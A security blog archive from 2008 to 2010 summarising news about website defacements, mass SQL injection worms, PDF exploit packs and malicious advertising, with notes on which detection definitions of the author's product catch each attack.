Title
Not Logged In [Login Now]

Security Blog

Google to Flag Potentially Compromised Sites More Aggressively

Posted by Luke Murphey on Dec 22nd 2010, 02:26 a.m. CST

Google is changing the methods it uses to flag sites as suspicious or dangerous. The changes will flag sites that are not necessarily malicious but may not be under the control of the owner (such as sites with spam or links from phishers).

Maxim Weinstein of Stopbadware.com told SC Magazine that:

Instead of say just lowering the site in the search rankings a bit, we're actually going to flag it in a more aggressive, public way.

Source: krebsonsecurity.com

Adobe PDF the Most Attacked Application

Posted by Luke Murphey on Apr 12th 2010, 03:40 p.m. CDT

PDF has become the most attacked application according to F-Secure. 61% targeted attacks F-Secure tracked in 2010 used an Adobe PDF exploit while 39% targeted Word, Excel or PowerPoint.

[techworld.com]

Gumblar website compromises increase 188% within a week

Posted by Luke Murphey on May 20th 2009, 01:44 a.m. CDT

Thousands of websites have been compromised by a worm that defaces websites and installs malicious code that attacks website visitors. The worm has been on a rampage and reportedly infected 188% more sites within a week. Gumblar has compromised a number of high profile websites including Tennis.com, Variety.com and Coldwellbanker.com.

If you want more details, Unmaskedparasites.com has a detailed technical writeup of Gumblar.

[SC Magazine]

Is Security a Myth?

Posted by Luke Murphey on Apr 06th 2009, 07:49 p.m. CDT

Baseline recently ran an article containing a list of discouraging statistics. No surprise, malicious web-based threats are on the list:

The number of new malicious Web sites in the fourth quarter of 2008 surpassed by 50 percent the total number of these sites in 2007, said the 2008 IBM X-Force Annual Trend and Risk Report.

[Baseline]

Microsoft Ireland Defaced

Posted by Luke Murphey on Dec 30th 2008, 04:16 p.m. CST

Microsoft Ireland was defaced by "Terrorist Crew." Hackers successfully compromised the microsoft.ie domain which redirects users to Microsoft.com/Ireland. The page that performs the redirection wasn't hosted by Microsoft but rather by a third party.

Most large websites are partially hosted by third parties; this makes monitoring extremely difficult for most existing security technologies (such as IDSes and firewalls) since they need to be installed in front of the web servers. Therefore, installation gets expensive since another device must be purchased and the third party must agree to installing in front of the website. Few companies are willing to pay for this and most hosting providers wouldn't allow it anyways.

What will go wrong in 2009

Posted by Luke Murphey on Dec 30th 2008, 04:01 p.m. CST

Bob Sullivan at MSNBC posted a blog entry indicating the things that will go wrong in 2009 in technology; he specifically lists malicious website defacements as one of them and sites the recent MyCheckFree.com defacement as an example. Below are excerpts:

"If you're wondering what computer headaches you should expect in 2009, the Checkfree attack should be high on your list, says Amit Klein, a domain name system expert at The Trusteer Security Research Group. He compared the attack to a phishing attack on steroids, and said it will probably keep security professionals up late at night. None of their fancy security tools can ward off complete interception of traffic headed to a Web site."

"There are new reasons not to trust the Web sites you visit. Getting a virus by clicking on an infected attachment is now passé; if your computer gets sick next year, it will probably be because you visited a booby-trapped Web site."

Credit: MSNBC

Thousands of Legitimate Websites Hosting New IE Flaw

Posted by Luke Murphey on Dec 19th 2008, 06:29 a.m. CST

The recently announced Internet Explorer flaw is being used on to conduct drive-by attacks against website browsers. Trend Micro notes that thousands of websites are hosting the exploit after being compromised by attackers. The Microsoft Malware Protection Center notes:

"some legitimate web sites were maliciously modified to include the exploits. For example a popular search engine in Taiwan was found to be hosting the exploit. Luckily, that site was quickly cleaned. Secondly, we’ve noticed some pornography sites have started hosting these exploits too: We recently found a web site in Hong Kong that serves various content including adult entertainment."

"Based on our stats, since the vulnerability has gone public, roughly 0.2% of users worldwide may have been exposed to websites containing exploits of this latest vulnerability."

0.2% is a staggering number given how many people use the Internet and how recently the exploit surfaced. This points out precisely the reason hackers choose to deface websites maliciously; few other methods can distribute an exploit that quickly and effectively.

Embassy of Brazil Compromised (in India)

Posted by Luke Murphey on Nov 23rd 2008, 04:33 a.m. CST

The website for the embassy of Brazil in India has been compromised and contains links to fake anti-virus software. This isn't the first time an embassy was compromised, consider the following embassy compromises:

1448 Adult Domains Compromised

Posted by Luke Murphey on Nov 23rd 2008, 04:23 a.m. CST

1448 adult domains were compromised by attackers. The domains were compromised after a compromised computer was used by an administrator who was managing the domain.

As of yet, the websites don't appear to be hosting malware or other undesirables. However, Dancho Danchev believes that might change.

Barack Obama Community Blog Malware

Posted by Luke Murphey on Nov 12th 2008, 07:03 p.m. CST

The website for the Barack Obama campaign is being used to direct users to sites containing malware according to a ZDnet report. Attackers uploaded an GIF to the community blog section of the website that links to the servers hosting the malware. Users' who search Google for "obama trojan anti-virus" are lead to the page with the GIF. Upon clicking, the user is sent to the malicious server.

Adobe Website "seriousmagic.com" Defaced

Posted by Luke Murphey on Oct 30th 2008, 05:06 a.m. CDT

The asprox worm is still making it's rounds. It successfully defaced seriousmagic.com, an Adobe owned website. Sophos says that the site was "riddled with infections".

Adobe didn't respond very quickly and eventually just redirected site visitors to adobe.com while they perform the cleanup. The site appears to be clean now.

Note that NSIA has had definitions for Asprox for a while (with the Compromise.Defacement.Mass_SQL_Injection definition).

PDF Exploit Packs

Posted by Luke Murphey on Sep 27th 2008, 08:34 p.m. CDT

Researchers have discovered PDF exploit packs, much like the web exploit packs such as IcePack. This means that PDF exploits are likely to increase. The biggest target will probably continue to be email users who aren't used to treating PDFs as dangerous. However, websites are at risk too since many sites allow PDFs to be uploaded by users.

Bill O'Reilly's Website Defaced

Posted by Luke Murphey on Sep 27th 2008, 08:18 p.m. CDT

The website of conservative commentator Bill O'Reilly has been defaced. The attackers also leaked login names and passwords that were not adequately protected.

ZDNet has a detailed overview of the attack and provides background information on the groups involved.

Large Hadron Collider Website Defaced

Posted by Luke Murphey on Sep 13th 2008, 06:23 a.m. CDT

Hackers defaced a web portal for the CERN Large Hadron Collider according to a SecurityFocus article. The hackers reportedly did nothing more than just deface the site which is fairly benign compared to what many attackers are doing.

The Large Hadron Collider went live on September 9th and captured much media attention. The amount of attention likely drew the attackers to the site.

Olympic News Sites Compromised

Posted by Luke Murphey on Sep 13th 2008, 06:18 a.m. CDT

A number of Olympic news sites have been compromised and are being used as malware distribution points. Attackers appear to have exploited a SQL injection vulnerability in order to modify pages; their modifications try to force websites visitors into downloading malicious code and joining a botnet.

Tom Clare of BlueCoat noted that "Any popular news source is going to be targeted for an attack because of the volume of traffic." This is further evidence that attackers are targeting high profile websites in order to deploy malware. This trend is likely to continue since website security is unlikely to improve substantially anytime soon.

Mass Defacements Related to Botnets?

Posted by Luke Murphey on Sep 01st 2008, 05:12 p.m. CDT

The number of machines controlled by botnets has grown by a factor of 4 in the last few months. Internet Storm Center Handler John Bambenek suggests that the increase may be due to the mass defacement attacks against websites that started around June of this year.

Michael Phelps Website Defaced

Posted by Luke Murphey on Aug 24th 2008, 05:31 a.m. CDT

The website of Olympian Michael Phelps was defaced. A screenshot of the defacement is available on the Internet.

An [SC Magazine article covering the defacement] (http://www.scmagazineus.com/Olympic-champion-Phelps-website-defaced-in-Turkish-hack/article/115773/) indicates that the attackers likely found a vulnerability that "enabled them access to the underlying directory, or through some attack means such as cross-site scripting." However, cross-site scripting is highly unlikely to have been the cause nor "access to the underlying directory" which implies that the attackers gained access to the file-system. Most likely, a SQL injection vulnerability is at fault and the malicious content was stored in the database (as opposed to on the file-system directly). The "Ask Michael" portion of the site was removed following the attack, thus, it is logical to conclude that this was vector that the attackers used since that portion of the site would have performed SQL queries.

Note that NSIA currently detects these types of defacements with the Compromise.HackerSignature definitions.

Flash Clipboard Attacks

Posted by Luke Murphey on Aug 24th 2008, 05:13 a.m. CDT

Attackers have found a way to hijack the clipboard using Flash. The attack simply causes the clipboard's paste function to always contain a malicious URL. The attackers hope that users would either click the links or send the malicious links in emails. Security Researcher Aviv Raff has posted a harmless demo of the attack(Note that your anti-virus client may block the Flash file).

The attackers get others' websites to host the malicious code for them by submitting malicious Flash ads to advertising companies.

Almost all platform and browser combination are affected since Flash is widely supported. Users of Linux and Mac OS-X are reporting they are indeed affected.

Update [Sep 27th 2008, 08:06 p.m. CDT]:

Adobe has announced that it plans on requiring user approval before accessing the clipboard in a future version of Flash. This will likely work similarly to the way Flash asks the user whether or not it can access the web-cam or microphone:

Flash camera access request form

Update [Oct 30th 2008, 05:09 a.m. CDT]:

Adobe has released an update to Flash that is intended to address the clipboard vulnerability as well as the click-jacking vulnerability.

Newsweek.com Posting Malicous Ads

Posted by Luke Murphey on Aug 24th 2008, 04:51 a.m. CDT

Newsweek.com was reportedly posting malicious advertisements. The advertisements try to trick users into purchasing anti-virus software by indicating that the user's PC is overrun with viruses.

SC Magazine noted that the attackers used Fuse in an attempt to evade detection. However, one must note there is nothing wrong with Fuse and it is not a malicious tool. It is simply a library for creating animations. The validation techniques used by the advertisers are more at fault than the Fuse developers.

New Mass Defacement Attack

Posted by Luke Murphey on Aug 09th 2008, 04:10 a.m. CDT

Another mass defacement is underway. This particular defacement leaves behind malicious scripts that attack website users. As of August 8th, about 4,000 sites have been impacted. The attacks are underway so additional sites will likely be impacted.

NSIA currently detects this using the cross-domain scripting definition.

Update []:

The number of pages compromised by this attack continues to increase according to the Internet Storm Center. Currently, about 33,000 pages have been impacted. Though this is lot of pages, this is significantly less than other similar attacks. You can view the impacted sites via Google. Obviously, do not view the web pages unless you want to get infected.

Update [Aug 25th 2008, 03:25 a.m. CDT]:

A new definition was created (Compromise.Defacement.MassSQLInjection) that will detect this specific SQL injection. Note that this new definition will usually trigger along with the cross domain scripting definition (Baseline.Property.CrossDomainScripting) whenever the attack successfully creates a script tag. However, this new definition will also detect failed attacks (those that do not successfully create a script tag).

ASPROX Defacements Abound

Posted by Luke Murphey on Aug 09th 2008, 04:10 a.m. CDT

The Internet Storm Center noted that many sites that were compromised by the ASPROX worm have not been cleaned up. Reportedly, about 1.5 million sites are still infected. Oftentimes defaced websites are not restored for a long time for any of the following reasons:

  • Site was cleaned but the vulnerability was not, thus, the website was simply re-infected as soon as it is fixed. This is more common than one might think. Many times the website owners don't know how to identify or fix the vulnerability. In big businesses, the changes may be held up in change control or other red tape.
  • The website owner no longer actively uses or mantains the site and doesn't know that it is compromised.
  • The compromised pages are at places that site owners didn't know existed (such as rogue web-servers or deprecated pages).

Note that the ASPROX defaced pages is currently detected by the cross-domain scripting definition.

Update [Aug 25th 2008, 02:57 a.m. CDT]:

The ASPROX infections appear to be dropping now. SANS reports that the number of infections has been reduced to about 175,000.